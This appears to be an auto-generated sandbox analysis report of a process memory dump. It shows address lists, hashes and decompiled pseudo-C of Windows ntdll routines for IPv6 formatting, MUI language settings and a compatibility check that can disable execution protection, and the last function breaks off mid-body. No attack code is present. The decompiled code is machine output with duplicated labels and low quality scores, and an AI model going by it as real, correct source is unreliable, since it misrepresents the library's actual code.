                                                                                                                                                            0x021f888b
                                                                                                                                                            0x021f888e
                                                                                                                                                            0x021f8891
                                                                                                                                                            0x021f8896
                                                                                                                                                            0x021f8899
                                                                                                                                                            0x021f8899
                                                                                                                                                            0x021f889e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02241b21
                                                                                                                                                            0x02241b27
                                                                                                                                                            0x02241b2e
                                                                                                                                                            0x02241b42
                                                                                                                                                            0x02241b44
                                                                                                                                                            0x02241b44
                                                                                                                                                            0x02241b4c
                                                                                                                                                            0x02241b4f
                                                                                                                                                            0x02241b55
                                                                                                                                                            0x02241b55
                                                                                                                                                            0x021f88a4
                                                                                                                                                            0x021f88aa
                                                                                                                                                            0x021f88b1
                                                                                                                                                            0x021f88c5
                                                                                                                                                            0x02241b5b
                                                                                                                                                            0x02241b5b
                                                                                                                                                            0x021f88c5
                                                                                                                                                            0x021f88ce
                                                                                                                                                            0x021f88e0
                                                                                                                                                            0x021f88e5
                                                                                                                                                            0x021f88e8
                                                                                                                                                            0x021f88e8
                                                                                                                                                            0x021f88ee
                                                                                                                                                            0x021f8900
                                                                                                                                                            0x021f8900
                                                                                                                                                            0x021f8905
                                                                                                                                                            0x00000000
                                                                                                                                                            0x021f8905

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 021F87E6
                                                                                                                                                            • WindowsExcludedProcs, xrefs: 021F87C1
                                                                                                                                                            • Kernel-MUI-Language-SKU, xrefs: 021F89FC
                                                                                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 021F8914
                                                                                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 021F8827
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcspbrk
                                                                                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                            • API String ID: 402402107-258546922
                                                                                                                                                            • Opcode ID: cdbe3e1a71513267a46ef50da6a182cce23f7740848348c85aaa47af1a58c679
                                                                                                                                                            • Instruction ID: 8ef4d1424b2cd48c7183e1f4128bf71ef06e513fe7e14a148e61e13b7aa40674
                                                                                                                                                            • Opcode Fuzzy Hash: cdbe3e1a71513267a46ef50da6a182cce23f7740848348c85aaa47af1a58c679
                                                                                                                                                            • Instruction Fuzzy Hash: 9BF1E5B2D40209EFCF55DFA8C980AEEBBB9FF08304F15446AE615A7210E7349A55DF60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                            			E022113CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                            				signed int _t78;
                                                                                                                                                            				signed int _t86;
                                                                                                                                                            				char _t90;
                                                                                                                                                            				signed int _t91;
                                                                                                                                                            				signed int _t96;
                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                            				signed int _t114;
                                                                                                                                                            				void* _t115;
                                                                                                                                                            				intOrPtr _t128;
                                                                                                                                                            				intOrPtr* _t129;
                                                                                                                                                            				void* _t130;
                                                                                                                                                            
                                                                                                                                                            				_t129 = _a4;
                                                                                                                                                            				_t128 = _a8;
                                                                                                                                                            				_t116 = 0;
                                                                                                                                                            				_t71 = _t128 + 0x5c;
                                                                                                                                                            				_v8 = 8;
                                                                                                                                                            				_v20 = _t71;
                                                                                                                                                            				if( *_t129 == 0) {
                                                                                                                                                            					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                            						goto L5;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                            						if(_t96 != 0) {
                                                                                                                                                            							L38:
                                                                                                                                                            							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                            								goto L5;
                                                                                                                                                            							} else {
                                                                                                                                                            								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            								_t86 = E02207707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                            								L36:
                                                                                                                                                            								return _t128 + _t86 * 2;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                            						if(_t114 == 0) {
                                                                                                                                                            							L33:
                                                                                                                                                            							_t115 = 0x21d2926;
                                                                                                                                                            							L35:
                                                                                                                                                            							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                            							_t86 = E02207707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                            							goto L36;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t114 != 0xffff) {
                                                                                                                                                            							_t116 = 0;
                                                                                                                                                            							goto L38;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t114 != 0) {
                                                                                                                                                            							_t115 = 0x21d9cac;
                                                                                                                                                            							goto L35;
                                                                                                                                                            						}
                                                                                                                                                            						goto L33;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L5:
                                                                                                                                                            					_a8 = _t116;
                                                                                                                                                            					_a4 = _t116;
                                                                                                                                                            					_v12 = _t116;
                                                                                                                                                            					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                            						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                            							_v8 = 6;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t90 = _v8;
                                                                                                                                                            					if(_t90 <= _t116) {
                                                                                                                                                            						L11:
                                                                                                                                                            						if(_a8 - _a4 <= 1) {
                                                                                                                                                            							_a8 = _t116;
                                                                                                                                                            							_a4 = _t116;
                                                                                                                                                            						}
                                                                                                                                                            						_t91 = 0;
                                                                                                                                                            						if(_v8 <= _t116) {
                                                                                                                                                            							L22:
                                                                                                                                                            							if(_v8 < 8) {
                                                                                                                                                            								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            								_t128 = _t128 + E02207707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                            							}
                                                                                                                                                            							return _t128;
                                                                                                                                                            						} else {
                                                                                                                                                            							L14:
                                                                                                                                                            							L14:
                                                                                                                                                            							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                            								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                            									_push(":");
                                                                                                                                                            									_push(_t71 - _t128 >> 1);
                                                                                                                                                            									_push(_t128);
                                                                                                                                                            									_t128 = _t128 + E02207707() * 2;
                                                                                                                                                            									_t71 = _v20;
                                                                                                                                                            									_t130 = _t130 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								_t78 = E02207707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                            								_t130 = _t130 + 0x10;
                                                                                                                                                            							} else {
                                                                                                                                                            								_push(L"::");
                                                                                                                                                            								_push(_t71 - _t128 >> 1);
                                                                                                                                                            								_push(_t128);
                                                                                                                                                            								_t78 = E02207707();
                                                                                                                                                            								_t130 = _t130 + 0xc;
                                                                                                                                                            								_t91 = _a8 - 1;
                                                                                                                                                            							}
                                                                                                                                                            							_t91 = _t91 + 1;
                                                                                                                                                            							_t128 = _t128 + _t78 * 2;
                                                                                                                                                            							_t71 = _v20;
                                                                                                                                                            							if(_t91 >= _v8) {
                                                                                                                                                            								goto L22;
                                                                                                                                                            							}
                                                                                                                                                            							_t116 = 0;
                                                                                                                                                            							goto L14;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						_t108 = 1;
                                                                                                                                                            						_v16 = _t129;
                                                                                                                                                            						_v24 = _t90;
                                                                                                                                                            						do {
                                                                                                                                                            							if( *_v16 == _t116) {
                                                                                                                                                            								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                            									_a4 = _v12;
                                                                                                                                                            									_a8 = _t108;
                                                                                                                                                            								}
                                                                                                                                                            								_t116 = 0;
                                                                                                                                                            							} else {
                                                                                                                                                            								_v12 = _t108;
                                                                                                                                                            							}
                                                                                                                                                            							_v16 = _v16 + 2;
                                                                                                                                                            							_t108 = _t108 + 1;
                                                                                                                                                            							_t26 =  &_v24;
                                                                                                                                                            							 *_t26 = _v24 - 1;
                                                                                                                                                            						} while ( *_t26 != 0);
                                                                                                                                                            						goto L11;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}




















                                                                                                                                                            0x022113d5
                                                                                                                                                            0x022113d9
                                                                                                                                                            0x022113dc
                                                                                                                                                            0x022113de
                                                                                                                                                            0x022113e1
                                                                                                                                                            0x022113e8
                                                                                                                                                            0x022113ee
                                                                                                                                                            0x0223e8fd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223e921
                                                                                                                                                            0x0223e921
                                                                                                                                                            0x0223e928
                                                                                                                                                            0x0223e982
                                                                                                                                                            0x0223e98a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223e99a
                                                                                                                                                            0x0223e99e
                                                                                                                                                            0x0223e9a3
                                                                                                                                                            0x0223e9a8
                                                                                                                                                            0x0223e9b9
                                                                                                                                                            0x0223e978
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223e978
                                                                                                                                                            0x0223e98a
                                                                                                                                                            0x0223e92a
                                                                                                                                                            0x0223e931
                                                                                                                                                            0x0223e944
                                                                                                                                                            0x0223e944
                                                                                                                                                            0x0223e950
                                                                                                                                                            0x0223e954
                                                                                                                                                            0x0223e959
                                                                                                                                                            0x0223e95e
                                                                                                                                                            0x0223e963
                                                                                                                                                            0x0223e970
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223e975
                                                                                                                                                            0x0223e93b
                                                                                                                                                            0x0223e980
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223e980
                                                                                                                                                            0x0223e942
                                                                                                                                                            0x0223e94b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223e94b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223e942
                                                                                                                                                            0x022113f4
                                                                                                                                                            0x022113f4
                                                                                                                                                            0x022113f9
                                                                                                                                                            0x022113fc
                                                                                                                                                            0x022113ff
                                                                                                                                                            0x02211406
                                                                                                                                                            0x0223e9cc
                                                                                                                                                            0x0223e9d2
                                                                                                                                                            0x0223e9d2
                                                                                                                                                            0x0223e9cc
                                                                                                                                                            0x0221140c
                                                                                                                                                            0x02211411
                                                                                                                                                            0x02211431
                                                                                                                                                            0x0221143a
                                                                                                                                                            0x0221143c
                                                                                                                                                            0x0221143f
                                                                                                                                                            0x0221143f
                                                                                                                                                            0x02211442
                                                                                                                                                            0x02211447
                                                                                                                                                            0x022114a8
                                                                                                                                                            0x022114ac
                                                                                                                                                            0x0223e9e2
                                                                                                                                                            0x0223e9e7
                                                                                                                                                            0x0223e9ec
                                                                                                                                                            0x0223ea05
                                                                                                                                                            0x0223ea05
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02211449
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02211449
                                                                                                                                                            0x0221144c
                                                                                                                                                            0x02211459
                                                                                                                                                            0x02211462
                                                                                                                                                            0x02211469
                                                                                                                                                            0x0221146a
                                                                                                                                                            0x02211470
                                                                                                                                                            0x02211473
                                                                                                                                                            0x02211476
                                                                                                                                                            0x02211476
                                                                                                                                                            0x02211490
                                                                                                                                                            0x02211495
                                                                                                                                                            0x0221138e
                                                                                                                                                            0x02211390
                                                                                                                                                            0x02211397
                                                                                                                                                            0x02211398
                                                                                                                                                            0x02211399
                                                                                                                                                            0x022113a1
                                                                                                                                                            0x022113a4
                                                                                                                                                            0x022113a4
                                                                                                                                                            0x02211498
                                                                                                                                                            0x0221149c
                                                                                                                                                            0x0221149f
                                                                                                                                                            0x022114a2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022114a4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x022114a4
                                                                                                                                                            0x02211413
                                                                                                                                                            0x02211415
                                                                                                                                                            0x02211416
                                                                                                                                                            0x02211419
                                                                                                                                                            0x0221141c
                                                                                                                                                            0x02211422
                                                                                                                                                            0x022113b7
                                                                                                                                                            0x022113bc
                                                                                                                                                            0x022113bf
                                                                                                                                                            0x022113bf
                                                                                                                                                            0x022113c2
                                                                                                                                                            0x02211424
                                                                                                                                                            0x02211424
                                                                                                                                                            0x02211424
                                                                                                                                                            0x02211427
                                                                                                                                                            0x0221142b
                                                                                                                                                            0x0221142c
                                                                                                                                                            0x0221142c
                                                                                                                                                            0x0221142c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0221141c
                                                                                                                                                            0x02211411

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                            • Opcode ID: 10e8a11e4be85da3109c26d108a719e2ba2cbeb1195e66e8f1ad8359232d4985
                                                                                                                                                            • Instruction ID: e390def1b5adaf107fabc6f2c428dc3daaabf3d78315786219976ce520875fe6
                                                                                                                                                            • Opcode Fuzzy Hash: 10e8a11e4be85da3109c26d108a719e2ba2cbeb1195e66e8f1ad8359232d4985
                                                                                                                                                            • Instruction Fuzzy Hash: 286103B1920656EADF38CFD9C8809BEBBF6EF94300714C12DE69A47548D374A650CBA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                            			E02207EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				char _v540;
                                                                                                                                                            				unsigned int _v544;
                                                                                                                                                            				signed int _v548;
                                                                                                                                                            				intOrPtr _v552;
                                                                                                                                                            				char _v556;
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t33;
                                                                                                                                                            				void* _t38;
                                                                                                                                                            				unsigned int _t46;
                                                                                                                                                            				unsigned int _t47;
                                                                                                                                                            				unsigned int _t52;
                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                            				unsigned int _t62;
                                                                                                                                                            				void* _t69;
                                                                                                                                                            				void* _t70;
                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                            				signed int _t73;
                                                                                                                                                            				void* _t74;
                                                                                                                                                            				void* _t75;
                                                                                                                                                            				void* _t76;
                                                                                                                                                            				void* _t77;
                                                                                                                                                            
                                                                                                                                                            				_t33 =  *0x22b2088; // 0x7769ef74
                                                                                                                                                            				_v8 = _t33 ^ _t73;
                                                                                                                                                            				_v548 = _v548 & 0x00000000;
                                                                                                                                                            				_t72 = _a4;
                                                                                                                                                            				if(E02207F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                            					__eflags = _v548;
                                                                                                                                                            					if(_v548 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_t62 = _t72 + 0x24;
                                                                                                                                                            					E02223F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                            					_t71 = 0x214;
                                                                                                                                                            					_v544 = 0x214;
                                                                                                                                                            					E021DDFC0( &_v540, 0, 0x214);
                                                                                                                                                            					_t75 = _t74 + 0x20;
                                                                                                                                                            					_t46 =  *0x22b4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                            					__eflags = _t46;
                                                                                                                                                            					if(_t46 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_t47 = _v544;
                                                                                                                                                            					__eflags = _t47;
                                                                                                                                                            					if(_t47 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t47 - 0x214;
                                                                                                                                                            					if(_t47 >= 0x214) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_push(_t62);
                                                                                                                                                            					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                            					E02223F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                            					_t52 = E021E0D27( &_v540, L"Execute=1");
                                                                                                                                                            					_t76 = _t75 + 0x1c;
                                                                                                                                                            					_push(_t62);
                                                                                                                                                            					__eflags = _t52;
                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                            						E02223F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                            						_t71 =  &_v540;
                                                                                                                                                            						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                            						_t77 = _t76 + 0x14;
                                                                                                                                                            						_v552 = _t56;
                                                                                                                                                            						__eflags = _t71 - _t56;
                                                                                                                                                            						if(_t71 >= _t56) {
                                                                                                                                                            							goto L1;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						}
                                                                                                                                                            						while(1) {
                                                                                                                                                            							L10:
                                                                                                                                                            							_t62 = E021E8375(_t71, 0x20);
                                                                                                                                                            							_pop(_t69);
                                                                                                                                                            							__eflags = _t62;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								 *_t62 = 0;
                                                                                                                                                            							}
                                                                                                                                                            							E02223F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                            							_t77 = _t77 + 0x10;
                                                                                                                                                            							E0224E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                            							__eflags = _t62;
                                                                                                                                                            							if(_t62 == 0) {
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            							_t31 = _t62 + 2; // 0x2
                                                                                                                                                            							_t71 = _t31;
                                                                                                                                                            							__eflags = _t71 - _v552;
                                                                                                                                                            							if(_t71 >= _v552) {
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                            					_push(3);
                                                                                                                                                            					_push(0x55);
                                                                                                                                                            					E02223F92();
                                                                                                                                                            					_t38 = 1;
                                                                                                                                                            					L2:
                                                                                                                                                            					return E021DE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                            				}
                                                                                                                                                            				L1:
                                                                                                                                                            				_t38 = 0;
                                                                                                                                                            				goto L2;
                                                                                                                                                            			}



























                                                                                                                                                            0x02207f08
                                                                                                                                                            0x02207f0f
                                                                                                                                                            0x02207f12
                                                                                                                                                            0x02207f1b
                                                                                                                                                            0x02207f31
                                                                                                                                                            0x02223ead
                                                                                                                                                            0x02223eb4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02223eba
                                                                                                                                                            0x02223ecd
                                                                                                                                                            0x02223ed2
                                                                                                                                                            0x02223ee1
                                                                                                                                                            0x02223ee7
                                                                                                                                                            0x02223eec
                                                                                                                                                            0x02223f12
                                                                                                                                                            0x02223f18
                                                                                                                                                            0x02223f1a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02223f20
                                                                                                                                                            0x02223f26
                                                                                                                                                            0x02223f28
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02223f2e
                                                                                                                                                            0x02223f30
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02223f3a
                                                                                                                                                            0x02223f3b
                                                                                                                                                            0x02223f53
                                                                                                                                                            0x02223f64
                                                                                                                                                            0x02223f69
                                                                                                                                                            0x02223f6c
                                                                                                                                                            0x02223f6d
                                                                                                                                                            0x02223f6f
                                                                                                                                                            0x0222e304
                                                                                                                                                            0x0222e30f
                                                                                                                                                            0x0222e315
                                                                                                                                                            0x0222e31e
                                                                                                                                                            0x0222e321
                                                                                                                                                            0x0222e327
                                                                                                                                                            0x0222e329
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0222e32f
                                                                                                                                                            0x0222e32f
                                                                                                                                                            0x0222e337
                                                                                                                                                            0x0222e33a
                                                                                                                                                            0x0222e33b
                                                                                                                                                            0x0222e33d
                                                                                                                                                            0x0222e33f
                                                                                                                                                            0x0222e341
                                                                                                                                                            0x0222e341
                                                                                                                                                            0x0222e34e
                                                                                                                                                            0x0222e353
                                                                                                                                                            0x0222e358
                                                                                                                                                            0x0222e35d
                                                                                                                                                            0x0222e35f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0222e365
                                                                                                                                                            0x0222e365
                                                                                                                                                            0x0222e368
                                                                                                                                                            0x0222e36e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0222e374
                                                                                                                                                            0x0222e32f
                                                                                                                                                            0x02223f75
                                                                                                                                                            0x02223f7a
                                                                                                                                                            0x02223f7c
                                                                                                                                                            0x02223f7e
                                                                                                                                                            0x02223f86
                                                                                                                                                            0x02207f39
                                                                                                                                                            0x02207f47
                                                                                                                                                            0x02207f47
                                                                                                                                                            0x02207f37
                                                                                                                                                            0x02207f37
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02223F12
                                                                                                                                                            Strings
                                                                                                                                                            • Execute=1, xrefs: 02223F5E
                                                                                                                                                            • ExecuteOptions, xrefs: 02223F04
                                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 0222E345
                                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02223F75
                                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02223EC4
                                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02223F4A
                                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0222E2FB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BaseDataModuleQuery
                                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                            • API String ID: 3901378454-484625025
                                                                                                                                                            • Opcode ID: 378a98ba053a42b73128b5e67b7eaa5b9e2b6384441043e537bca293b8bff135
                                                                                                                                                            • Instruction ID: 18974d8d942e382a3572aca2d2bbab1861450e7adf6006d1edae24e90f59a735
                                                                                                                                                            • Opcode Fuzzy Hash: 378a98ba053a42b73128b5e67b7eaa5b9e2b6384441043e537bca293b8bff135
                                                                                                                                                            • Instruction Fuzzy Hash: 5741E9716D031DBAEF20EAD4DCC9FEAB3BDAF14704F0005A9E505E6081EB75AA458F61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E02210B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				void* _t108;
                                                                                                                                                            				void* _t116;
                                                                                                                                                            				char _t120;
                                                                                                                                                            				short _t121;
                                                                                                                                                            				void* _t128;
                                                                                                                                                            				intOrPtr* _t130;
                                                                                                                                                            				char _t132;
                                                                                                                                                            				short _t133;
                                                                                                                                                            				intOrPtr _t141;
                                                                                                                                                            				signed int _t156;
                                                                                                                                                            				signed int _t174;
                                                                                                                                                            				intOrPtr _t177;
                                                                                                                                                            				intOrPtr* _t179;
                                                                                                                                                            				intOrPtr _t180;
                                                                                                                                                            				void* _t183;
                                                                                                                                                            
                                                                                                                                                            				_t179 = _a4;
                                                                                                                                                            				_t141 =  *_t179;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v24 = 0;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_v32 = 0;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				if(_t141 == 0) {
                                                                                                                                                            					L41:
                                                                                                                                                            					 *_a8 = _t179;
                                                                                                                                                            					_t180 = _v24;
                                                                                                                                                            					if(_t180 != 0) {
                                                                                                                                                            						if(_t180 != 3) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						_v8 = _v8 + 1;
                                                                                                                                                            					}
                                                                                                                                                            					_t174 = _v32;
                                                                                                                                                            					if(_t174 == 0) {
                                                                                                                                                            						if(_v8 == 7) {
                                                                                                                                                            							goto L43;
                                                                                                                                                            						}
                                                                                                                                                            						goto L6;
                                                                                                                                                            					}
                                                                                                                                                            					L43:
                                                                                                                                                            					if(_v16 != 1) {
